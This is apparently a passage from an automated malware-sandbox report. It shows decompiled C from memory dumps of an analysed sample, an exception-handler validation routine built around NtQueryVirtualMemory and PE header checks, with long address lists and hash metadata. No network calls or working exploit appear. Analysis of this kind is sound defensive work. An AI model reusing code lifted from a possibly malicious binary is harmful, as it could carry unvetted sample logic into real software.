                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x2194180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                        								if( *((intOrPtr*)(0x2194180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t58 = _t58 + 1;
                                                                                                                                                                                                                        								__eflags = _t58 - _t81;
                                                                                                                                                                                                                        								if(_t58 < _t81) {
                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                                        							if(_t58 <= 0) {
                                                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							 *0x21941c0 = 1;
                                                                                                                                                                                                                        							__eflags =  *0x21941c0;
                                                                                                                                                                                                                        							if( *0x21941c0 != 0) {
                                                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							__eflags =  *((intOrPtr*)(0x2194180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                        							if( *((intOrPtr*)(0x2194180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                                        								_t100 = 0;
                                                                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                                                                        								if(_t58 < 0) {
                                                                                                                                                                                                                        									L34:
                                                                                                                                                                                                                        									 *0x21941c0 = 0;
                                                                                                                                                                                                                        									goto L5;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								do {
                                                                                                                                                                                                                        									L33:
                                                                                                                                                                                                                        									_t90 = 0x2194180 + _t100 * 4;
                                                                                                                                                                                                                        									_t100 = _t100 + 1;
                                                                                                                                                                                                                        									__eflags = _t100 - _t58;
                                                                                                                                                                                                                        									 *_t90 = _t110;
                                                                                                                                                                                                                        									_t110 =  *_t90;
                                                                                                                                                                                                                        								} while (_t100 <= _t58);
                                                                                                                                                                                                                        								goto L34;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							_t58 = _t81 - 1;
                                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                                        							if(_t58 < 0) {
                                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                                        								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                        								if(_t81 < 0x10) {
                                                                                                                                                                                                                        									_t81 = _t81 + 1;
                                                                                                                                                                                                                        									__eflags = _t81;
                                                                                                                                                                                                                        									 *0x2194178 = _t81;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t58 = _t81 - 1;
                                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                        								L25:
                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x2194180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                        								if( *((intOrPtr*)(0x2194180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t58 = _t58 - 1;
                                                                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                                                                        								if(_t58 >= 0) {
                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                                        							if(__eflags >= 0) {
                                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                                        									goto L34;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L28;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                        						__eflags = _t75 - _v8;
                                                                                                                                                                                                                        						if(_t75 < _v8) {
                                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						__eflags = _t75 - _t108;
                                                                                                                                                                                                                        						if(_t75 >= _t108) {
                                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                                        					goto L60;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}




































                                                                                                                                                                                                                        0x021923ff
                                                                                                                                                                                                                        0x02192402
                                                                                                                                                                                                                        0x02192408
                                                                                                                                                                                                                        0x02192426
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192426
                                                                                                                                                                                                                        0x02192410
                                                                                                                                                                                                                        0x02192419
                                                                                                                                                                                                                        0x0219241f
                                                                                                                                                                                                                        0x0219242e
                                                                                                                                                                                                                        0x02192431
                                                                                                                                                                                                                        0x02192434
                                                                                                                                                                                                                        0x0219243e
                                                                                                                                                                                                                        0x0219243e
                                                                                                                                                                                                                        0x02192440
                                                                                                                                                                                                                        0x02192443
                                                                                                                                                                                                                        0x02192445
                                                                                                                                                                                                                        0x02192445
                                                                                                                                                                                                                        0x02192447
                                                                                                                                                                                                                        0x0219244a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x0219244c
                                                                                                                                                                                                                        0x0219244e
                                                                                                                                                                                                                        0x021924b4
                                                                                                                                                                                                                        0x021924b4
                                                                                                                                                                                                                        0x02192612
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192612
                                                                                                                                                                                                                        0x02192450
                                                                                                                                                                                                                        0x02192450
                                                                                                                                                                                                                        0x02192454
                                                                                                                                                                                                                        0x02192456
                                                                                                                                                                                                                        0x02192456
                                                                                                                                                                                                                        0x02192456
                                                                                                                                                                                                                        0x02192456
                                                                                                                                                                                                                        0x02192459
                                                                                                                                                                                                                        0x0219245a
                                                                                                                                                                                                                        0x0219245d
                                                                                                                                                                                                                        0x0219245d
                                                                                                                                                                                                                        0x02192461
                                                                                                                                                                                                                        0x02192465
                                                                                                                                                                                                                        0x02192473
                                                                                                                                                                                                                        0x02192473
                                                                                                                                                                                                                        0x0219247b
                                                                                                                                                                                                                        0x02192481
                                                                                                                                                                                                                        0x02192483
                                                                                                                                                                                                                        0x02192485
                                                                                                                                                                                                                        0x02192495
                                                                                                                                                                                                                        0x021924a2
                                                                                                                                                                                                                        0x021924a6
                                                                                                                                                                                                                        0x021924ab
                                                                                                                                                                                                                        0x021924ad
                                                                                                                                                                                                                        0x0219252b
                                                                                                                                                                                                                        0x0219252b
                                                                                                                                                                                                                        0x021924af
                                                                                                                                                                                                                        0x021924af
                                                                                                                                                                                                                        0x021924af
                                                                                                                                                                                                                        0x0219252d
                                                                                                                                                                                                                        0x0219252f
                                                                                                                                                                                                                        0x02192610
                                                                                                                                                                                                                        0x02192610
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192535
                                                                                                                                                                                                                        0x02192535
                                                                                                                                                                                                                        0x0219253c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192542
                                                                                                                                                                                                                        0x02192546
                                                                                                                                                                                                                        0x021925a2
                                                                                                                                                                                                                        0x021925a4
                                                                                                                                                                                                                        0x021925ac
                                                                                                                                                                                                                        0x021925ae
                                                                                                                                                                                                                        0x021925b0
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021925b2
                                                                                                                                                                                                                        0x021925b8
                                                                                                                                                                                                                        0x021925ba
                                                                                                                                                                                                                        0x021925bc
                                                                                                                                                                                                                        0x021925d1
                                                                                                                                                                                                                        0x021925d1
                                                                                                                                                                                                                        0x021925d3
                                                                                                                                                                                                                        0x02192602
                                                                                                                                                                                                                        0x02192609
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192609
                                                                                                                                                                                                                        0x021925d7
                                                                                                                                                                                                                        0x021925d8
                                                                                                                                                                                                                        0x021925da
                                                                                                                                                                                                                        0x021925dc
                                                                                                                                                                                                                        0x021925dc
                                                                                                                                                                                                                        0x021925de
                                                                                                                                                                                                                        0x021925e0
                                                                                                                                                                                                                        0x021925e2
                                                                                                                                                                                                                        0x021925f6
                                                                                                                                                                                                                        0x021925f6
                                                                                                                                                                                                                        0x021925f9
                                                                                                                                                                                                                        0x021925fb
                                                                                                                                                                                                                        0x021925fb
                                                                                                                                                                                                                        0x021925fc
                                                                                                                                                                                                                        0x021925fc
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021925e4
                                                                                                                                                                                                                        0x021925e4
                                                                                                                                                                                                                        0x021925e4
                                                                                                                                                                                                                        0x021925ed
                                                                                                                                                                                                                        0x021925ee
                                                                                                                                                                                                                        0x021925f0
                                                                                                                                                                                                                        0x021925f2
                                                                                                                                                                                                                        0x021925f2
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021925e4
                                                                                                                                                                                                                        0x021925e2
                                                                                                                                                                                                                        0x021925be
                                                                                                                                                                                                                        0x021925c5
                                                                                                                                                                                                                        0x021925c5
                                                                                                                                                                                                                        0x021925c7
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021925c9
                                                                                                                                                                                                                        0x021925ca
                                                                                                                                                                                                                        0x021925cd
                                                                                                                                                                                                                        0x021925cf
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021925cf
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021925c5
                                                                                                                                                                                                                        0x02192548
                                                                                                                                                                                                                        0x0219254b
                                                                                                                                                                                                                        0x02192550
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192559
                                                                                                                                                                                                                        0x0219255b
                                                                                                                                                                                                                        0x02192561
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192567
                                                                                                                                                                                                                        0x0219256d
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192573
                                                                                                                                                                                                                        0x02192575
                                                                                                                                                                                                                        0x0219257e
                                                                                                                                                                                                                        0x02192582
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192588
                                                                                                                                                                                                                        0x0219258b
                                                                                                                                                                                                                        0x0219258d
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192594
                                                                                                                                                                                                                        0x02192596
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192598
                                                                                                                                                                                                                        0x0219259c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x0219259c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192487
                                                                                                                                                                                                                        0x02192487
                                                                                                                                                                                                                        0x02192487
                                                                                                                                                                                                                        0x0219248e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192490
                                                                                                                                                                                                                        0x02192491
                                                                                                                                                                                                                        0x02192493
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192493
                                                                                                                                                                                                                        0x021924bb
                                                                                                                                                                                                                        0x021924bd
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021924cd
                                                                                                                                                                                                                        0x021924cf
                                                                                                                                                                                                                        0x021924d1
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021924d7
                                                                                                                                                                                                                        0x021924de
                                                                                                                                                                                                                        0x0219250a
                                                                                                                                                                                                                        0x0219250a
                                                                                                                                                                                                                        0x0219250c
                                                                                                                                                                                                                        0x0219250e
                                                                                                                                                                                                                        0x02192522
                                                                                                                                                                                                                        0x02192524
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192510
                                                                                                                                                                                                                        0x02192510
                                                                                                                                                                                                                        0x02192510
                                                                                                                                                                                                                        0x02192519
                                                                                                                                                                                                                        0x0219251a
                                                                                                                                                                                                                        0x0219251c
                                                                                                                                                                                                                        0x0219251e
                                                                                                                                                                                                                        0x0219251e
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192510
                                                                                                                                                                                                                        0x021924e0
                                                                                                                                                                                                                        0x021924e3
                                                                                                                                                                                                                        0x021924e5
                                                                                                                                                                                                                        0x021924f7
                                                                                                                                                                                                                        0x021924f7
                                                                                                                                                                                                                        0x021924fa
                                                                                                                                                                                                                        0x021924fc
                                                                                                                                                                                                                        0x021924fc
                                                                                                                                                                                                                        0x021924fd
                                                                                                                                                                                                                        0x021924fd
                                                                                                                                                                                                                        0x02192503
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021924e7
                                                                                                                                                                                                                        0x021924e7
                                                                                                                                                                                                                        0x021924e7
                                                                                                                                                                                                                        0x021924ee
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021924f0
                                                                                                                                                                                                                        0x021924f0
                                                                                                                                                                                                                        0x021924f1
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021924f1
                                                                                                                                                                                                                        0x021924f3
                                                                                                                                                                                                                        0x021924f5
                                                                                                                                                                                                                        0x02192508
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192508
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x021924f5
                                                                                                                                                                                                                        0x02192467
                                                                                                                                                                                                                        0x0219246a
                                                                                                                                                                                                                        0x0219246d
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x0219246f
                                                                                                                                                                                                                        0x02192471
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02192471
                                                                                                                                                                                                                        0x02192436
                                                                                                                                                                                                                        0x02192438
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 021924A6
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850889275-0
                                                                                                                                                                                                                        • Opcode ID: 1cd8f35abac36856dd194d601330507ea8be7757353c523cbfe040bab7ec2ddb
                                                                                                                                                                                                                        • Instruction ID: 06b3b67ccca48192d37e05c846f6850556a05fadc3c6cf7b0f86292ece514bad
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cd8f35abac36856dd194d601330507ea8be7757353c523cbfe040bab7ec2ddb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9261EC306C0601BFEF29CE29D9B076973E5FB46358B258439DC56D7691E730E882CB90
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026FB10D(long _a4) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                        				short* _v32;
                                                                                                                                                                                                                        				void _v36;
                                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                                        				signed int* _t68;
                                                                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                                                                        				intOrPtr* _t71;
                                                                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                        				void _t80;
                                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                                                                        				short* _t87;
                                                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                                                        				signed int* _t90;
                                                                                                                                                                                                                        				long _t91;
                                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                                        				long _t108;
                                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t108 = _a4;
                                                                                                                                                                                                                        				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                        				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                        				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                        				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                        					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                        					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                        					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                        						_t91 = 0;
                                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                                        						_a4 = 0;
                                                                                                                                                                                                                        						_t57 = _t76;
                                                                                                                                                                                                                        						do {
                                                                                                                                                                                                                        							_t80 =  *_t57;
                                                                                                                                                                                                                        							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                        							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							__eflags = _t80 - _t91;
                                                                                                                                                                                                                        							if(_t80 >= _t91) {
                                                                                                                                                                                                                        								L20:
                                                                                                                                                                                                                        								_t63 = 0;
                                                                                                                                                                                                                        								L60:
                                                                                                                                                                                                                        								return _t63;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                                        							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                        							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                        								_t12 =  &_a4;
                                                                                                                                                                                                                        								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                        								__eflags =  *_t12;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                                                                                        							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                        							__eflags = _t91 - _t102;
                                                                                                                                                                                                                        						} while (_t91 <= _t102);
                                                                                                                                                                                                                        						__eflags = _a4;
                                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                                        							L15:
                                                                                                                                                                                                                        							_t81 =  *0x26fd2d8; // 0x0
                                                                                                                                                                                                                        							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                        							_t58 = 0;
                                                                                                                                                                                                                        							__eflags = _t81;
                                                                                                                                                                                                                        							if(_t81 <= 0) {
                                                                                                                                                                                                                        								L18:
                                                                                                                                                                                                                        								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                        								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                        								__eflags = _t61;
                                                                                                                                                                                                                        								if(_t61 < 0) {
                                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									_t62 = _a4;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								__eflags = _t62;
                                                                                                                                                                                                                        								if(_t62 == 0) {
                                                                                                                                                                                                                        									L59:
                                                                                                                                                                                                                        									_t63 = _t104;
                                                                                                                                                                                                                        									goto L60;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                        									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                        									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                        										L46:
                                                                                                                                                                                                                        										_t63 = 1;
                                                                                                                                                                                                                        										 *0x26fd320 = 1;
                                                                                                                                                                                                                        										__eflags =  *0x26fd320;
                                                                                                                                                                                                                        										if( *0x26fd320 != 0) {
                                                                                                                                                                                                                        											goto L60;
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										_t84 =  *0x26fd2d8; // 0x0
                                                                                                                                                                                                                        										__eflags = _t84;
                                                                                                                                                                                                                        										_t93 = _t84;
                                                                                                                                                                                                                        										if(_t84 <= 0) {
                                                                                                                                                                                                                        											L51:
                                                                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                                                                        											if(_t93 != 0) {
                                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                                        												 *0x26fd320 = 0;
                                                                                                                                                                                                                        												goto L5;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        											_t77 = 0xf;
                                                                                                                                                                                                                        											__eflags = _t84 - _t77;
                                                                                                                                                                                                                        											if(_t84 <= _t77) {
                                                                                                                                                                                                                        												_t77 = _t84;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        											_t94 = 0;
                                                                                                                                                                                                                        											__eflags = _t77;
                                                                                                                                                                                                                        											if(_t77 < 0) {
                                                                                                                                                                                                                        												L56:
                                                                                                                                                                                                                        												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                        												if(_t84 < 0x10) {
                                                                                                                                                                                                                        													_t86 = _t84 + 1;
                                                                                                                                                                                                                        													__eflags = _t86;
                                                                                                                                                                                                                        													 *0x26fd2d8 = _t86;
                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                        												do {
                                                                                                                                                                                                                        													_t68 = 0x26fd2e0 + _t94 * 4;
                                                                                                                                                                                                                        													_t94 = _t94 + 1;
                                                                                                                                                                                                                        													__eflags = _t94 - _t77;
                                                                                                                                                                                                                        													 *_t68 = _t110;
                                                                                                                                                                                                                        													_t110 =  *_t68;
                                                                                                                                                                                                                        												} while (_t94 <= _t77);
                                                                                                                                                                                                                        												goto L56;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										_t69 = 0x26fd2dc + _t84 * 4;
                                                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                                                        											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                        											if( *_t69 == _t110) {
                                                                                                                                                                                                                        												goto L51;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        											_t93 = _t93 - 1;
                                                                                                                                                                                                                        											_t69 = _t69 - 4;
                                                                                                                                                                                                                        											__eflags = _t93;
                                                                                                                                                                                                                        											if(_t93 > 0) {
                                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        											goto L51;
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        										goto L51;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t87 = _v32;
                                                                                                                                                                                                                        									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                        									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                        									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                        									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                        									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t78 = _t76 - _t87;
                                                                                                                                                                                                                        									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                        									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                        									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                        										goto L59;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                        									__eflags = _t78 - _t72;
                                                                                                                                                                                                                        									if(_t78 < _t72) {
                                                                                                                                                                                                                        										goto L46;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                        									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                        										goto L46;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                        									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                        										goto L20;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                                        								__eflags =  *((intOrPtr*)(0x26fd2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                        								if( *((intOrPtr*)(0x26fd2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t58 = _t58 + 1;
                                                                                                                                                                                                                        								__eflags = _t58 - _t81;
                                                                                                                                                                                                                        								if(_t58 < _t81) {
                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                                        							if(_t58 <= 0) {
                                                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							 *0x26fd320 = 1;
                                                                                                                                                                                                                        							__eflags =  *0x26fd320;
                                                                                                                                                                                                                        							if( *0x26fd320 != 0) {
                                                                                                                                                                                                                        								goto L5;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							__eflags =  *((intOrPtr*)(0x26fd2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                        							if( *((intOrPtr*)(0x26fd2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                                        								_t100 = 0;
                                                                                                                                                                                                                        								__eflags = _t58;
                                                                                                                                                                                                                        								if(_t58 < 0) {
                                                                                                                                                                                                                        									L34:
                                                                                                                                                                                                                        									 *0x26fd320 = 0;
                                                                                                                                                                                                                        									goto L5;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								do {
                                                                                                                                                                                                                        									L33:
                                                                                                                                                                                                                        									_t90 = 0x26fd2e0 + _t100 * 4;
                                                                                                                                                                                                                        									_t100 = _t100 + 1;
                                                                                                                                                                                                                        									__eflags = _t100 - _t58;
                                                                                                                                                                                                                        									 *_t90 = _t110;
